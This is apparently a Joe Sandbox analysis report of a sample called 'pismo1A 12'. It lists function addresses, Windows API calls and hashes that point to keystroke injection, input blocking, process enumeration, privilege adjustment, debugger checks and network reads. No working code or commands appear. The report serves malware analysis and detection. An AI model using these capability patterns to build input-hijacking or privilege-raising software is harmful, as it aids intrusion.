Part of subcall function 006BCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,006E3303,?), ref: 006BCE8A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 122daa947f8f247fa48f9fce62ca6e7b2d5e4cad3e94020f644cf3174245a316
Instruction ID: 89e1cef35de5ee43a98196cbcd2d826a504d29f405810b70188a0b05af8b738d
Opcode Fuzzy Hash: 122daa947f8f247fa48f9fce62ca6e7b2d5e4cad3e94020f644cf3174245a316
Instruction Fuzzy Hash: 1B5169B1508310AFD350EF24D886A6BBBE9FF89754F00892DF58997251EB34D904CBA6

Function 0070AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0070AAAC
SetKeyboardState.USER32(00000080), ref: 0070AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0070AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0070AB88

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
Instruction ID: 2a7aa1cd79dff489cca7e8fef215b72bb1f7b3894cb037489048bd9a19bd74df
Opcode Fuzzy Hash: f9366f6474de9c52feb160dcf0b84914c9f4cf1557d65b8f56c127088192d660
Instruction Fuzzy Hash: 8E31E3B1A40358FEFF358A68CC09BFA7BEAAB44310F04831AE585965D1D37D8981C766

Function 0071CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0071CE89
GetLastError.KERNEL32(?,00000000), ref: 0071CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0071CEFE

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: f4a92f9a046435aa3e63485cc479d9859e46df44689b8a84595c1b06916f0120
Instruction ID: 4a5b515f33e8cae49efa8089e5245ae33c40f08e582d6e4ed54de5c17234f069
Opcode Fuzzy Hash: f4a92f9a046435aa3e63485cc479d9859e46df44689b8a84595c1b06916f0120
Instruction Fuzzy Hash: 5721C1B25403059BE732CFA9C949BA7B7FDEB00314F10841EE546E2191E778EE898B94

Function 006D2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 006D271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006D2724
UnhandledExceptionFilter.KERNEL32(?), ref: 006D2731

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
Instruction ID: 82129e98ceb914254db507af9767c37e66a9ef1b6a7019d6d33ef44b6f064c79
Opcode Fuzzy Hash: 360ede8d9f591d8de36dc7886c70b6a16014ae8f4667c6816fe02721d1dc1067
Instruction Fuzzy Hash: 5631C475901219ABCB61DF64DC88BD9BBB9EF18310F5041EAE81CA7261E7349F818F49

Function 007151CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007151DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00715238
SetErrorMode.KERNEL32(00000000), ref: 007152A1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
Instruction ID: 6c2f15cdca38c03f3aeb3e2ec927e73b73a19bae3730dfee2146c717a21ebcb1
Opcode Fuzzy Hash: 425ebe74e7c0049e3e75ad3c89df0288cc21452a36fc839be6be507261a8a33d
Instruction Fuzzy Hash: C4314C75A00618DFDB00EF54D884EADBBB5FF49314F088099E805AB3A2DB35EC55CBA4

Function 007016C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0668
Part of subcall function 006BFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006C0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0070170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0070173A
GetLastError.KERNEL32 ref: 0070174A

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
Instruction ID: c20e52b808bc765f376d7aee92f599ec042f5bb52a514c3adfb35487246663b1
Opcode Fuzzy Hash: f7bc4d627b391589d0e16ed224c204c61e67137e90c5ee37489bd426b08f56dd
Instruction Fuzzy Hash: D611CEB2400304EFE718AF54DC86DAAB7F9EF04714B20862EE05653291EB75FC818B24

Function 0070D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0070D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0070D650

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
Instruction ID: e9707ec8740eb557732030d41d2a22dde7409bb384ad1c28fa7e1104e7f4a313
Opcode Fuzzy Hash: f0ab25f5df96f83bfbfce2293abae31f90fa59c2f773f4798e8c491f971c77a2
Instruction Fuzzy Hash: 07113C75E05228BBEB218F959C45FAFBBBCEB45B50F108115F904E7290D6744A058BA1

Function 00701663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0070168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007016A1
FreeSid.ADVAPI32(?), ref: 007016B1

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
Instruction ID: 452b0e85089ff896b44f52b8a94e1dcf1ad64072683e0569eae5b810ff8ce9de
Opcode Fuzzy Hash: 2c4a971b46f591e69d2ab05b887dd78da1dded3b6fb54cbc138405cfa4aa39b5
Instruction Fuzzy Hash: 85F0F47195030DFBEB00DFE49D89AAEBBBCEB08705F508565E601E2181E778AA448B54

Function 006C4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(006D28E9,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D09
TerminateProcess.KERNEL32(00000000,?,006C4CBE,006D28E9,007688B8,0000000C,006C4E15,006D28E9,00000002,00000000,?,006D28E9), ref: 006C4D10
ExitProcess.KERNEL32 ref: 006C4D22

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
Instruction ID: fac4cfefb995b5db96842d5655a92f12fd2bffe5817c434e8b2ccf7f6a35c7e3
Opcode Fuzzy Hash: b4c59affcc6aea63764ef6c43d89e639ddf5b164e1c03de4d4f490dd340bfd2d
Instruction Fuzzy Hash: 49E0BF31400148ABDF12BF54DD19F983B6AEF41752B108418FC059A222CB39ED51DB45

Function 006DC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 006DC36C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 60482e335f454a06c89f077e83594d3dba33416e1c4cef118a2651a4dac7a400
Instruction ID: 0654882f93841b4802c39e36e9e0476024e8b2a3d98a01bda4daad49019059f8
Opcode Fuzzy Hash: 60482e335f454a06c89f077e83594d3dba33416e1c4cef118a2651a4dac7a400
Instruction Fuzzy Hash: 8B41077690021A6BCB249FB9CC49DFB77BAEB84324F10426EF905D7380E6719E41CB54

Function 006FD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 006FD28C

Strings

X64, xrefs: 006FD2A8

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
Instruction ID: b151787dcd9bd1ad6c5a9df3371e56b2e43566d6f370f890789566abfb20119d
Opcode Fuzzy Hash: 2e77ff26d8f6f15d6b1e20184bce4ef7e60c9ae3a00ca8495e59fc507fdd9ad3
Instruction Fuzzy Hash: 89D0C9B480111DEACB94DB90DC88DE9B37DBB04305F104151F206A2000D73496498F10

Function 006CCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: 72eaf6ead7c1603456a45eb2c977c0f47fd97d4780100a44f883ebf7a141a2bf
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: B7020C71E012199BDF14CFA9C980BEDBBF2EF49324F25416ED819EB384D731A9418B94

Function 006ACAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 006F0C40
p#w, xrefs: 006ACF7F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#w
API String ID: 0-2679264178
Opcode ID: c05be41ebe4ea2c1de44850925442170df455937e0331f89bb90d9f1ed41e395
Instruction ID: 0c9a68b88ca0f5154dd059afdb191f21e4326c43340447c7b23a2f1340fd916d
Opcode Fuzzy Hash: c05be41ebe4ea2c1de44850925442170df455937e0331f89bb90d9f1ed41e395
Instruction Fuzzy Hash: 17326970900218DFDF14EF94C995AEDB7B6BF06324F148059E906AB292DB35AE46CF60

Function 007168EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00716918
FindClose.KERNEL32(00000000), ref: 00716961

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
Instruction ID: b06c61a7e56c3c22db5e93c8e9d760f5784ee82298e4b73481c8058d18c9d44d
Opcode Fuzzy Hash: f65f3ac495206ccc31e70c04708f3f1ff71a792dfe051bef7d1075e438a91a82
Instruction Fuzzy Hash: 1F1190716042109FD710DF29D885A16BBE5FF85329F14C69DE8698F2A2CB34EC45CB91

Function 007137B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00724891,?,?,00000035,?), ref: 007137F4

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5cc684e790bc87d561c3067e436a4013fd587f87c1f33252bd649a98878a2f7c
Instruction ID: 96491131d07fb1520261e7f0fae0a04a081202817b39aaa5b30cd65bf441ee64
Opcode Fuzzy Hash: 5cc684e790bc87d561c3067e436a4013fd587f87c1f33252bd649a98878a2f7c
Instruction Fuzzy Hash: FCF0E5B16053282AE760276A8C8DFEB3AAEEFC5761F004275F509E22C1D9709D44C7B4

Function 0070B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0070B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0070B270

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
Instruction ID: aea4b074a3ac3f04c0e0650a50bcba916b325783939dd3fc987f196e21198a65
Opcode Fuzzy Hash: fd2ca1d65edf3dc9069eb025b35a631d65bb6cdbcd695eb82fbe924a478f57ce
Instruction Fuzzy Hash: A8F01D7180424DEBEB059FA0C805BAE7BB4FF08305F108009F955A5191C37D86119F94

Function 007010BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007011FC), ref: 007010D4
CloseHandle.KERNEL32(?,?,007011FC), ref: 007010E9

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: dc1f0d27dfd0e627a9083daabbbeb4abfc1f63a16542e750dee53f6e0232447b
Instruction ID: d1970fe0007bf09ca353169a7f71f05e2a11eab8476e86f5b4c2025cab291ea5
Opcode Fuzzy Hash: dc1f0d27dfd0e627a9083daabbbeb4abfc1f63a16542e750dee53f6e0232447b
Instruction Fuzzy Hash: CEE04F72004610EEF7262B11FC05EB377E9EF04311B10C82DF4A5804B1DB62ACE0DB14

Function 006D676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006D6766,?,?,00000008,?,?,006DFEFE,00000000), ref: 006D6998

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
Instruction ID: d0a71075a0ecf798b2b420c7de3f02319666d723476ece573864ebbc95f7c385
Opcode Fuzzy Hash: ddcedb095aeb0ef60ac9231020b314afc5eeb7427af04a027011a2a3798c3466
Instruction Fuzzy Hash: F3B14A31A106099FD715CF28C486BA57BA1FF45364F298659F8DACF3A2C335E982CB40

Function 006BB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 006F851F

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
Instruction ID: 30eec812021445e9a54589fea8b8cae271ff40b11545dabfc65b7bcdcf654dc2
Opcode Fuzzy Hash: f46b6157c0091ee5cde96481e191aca1e8a21aced17f0ece02adb74db63867c7
Instruction Fuzzy Hash: 9B125FB19002299FDB24CF58C8816FEB7F6FF48710F14819AE949EB255DB749E81CB90

Function 0071EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0071EABD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
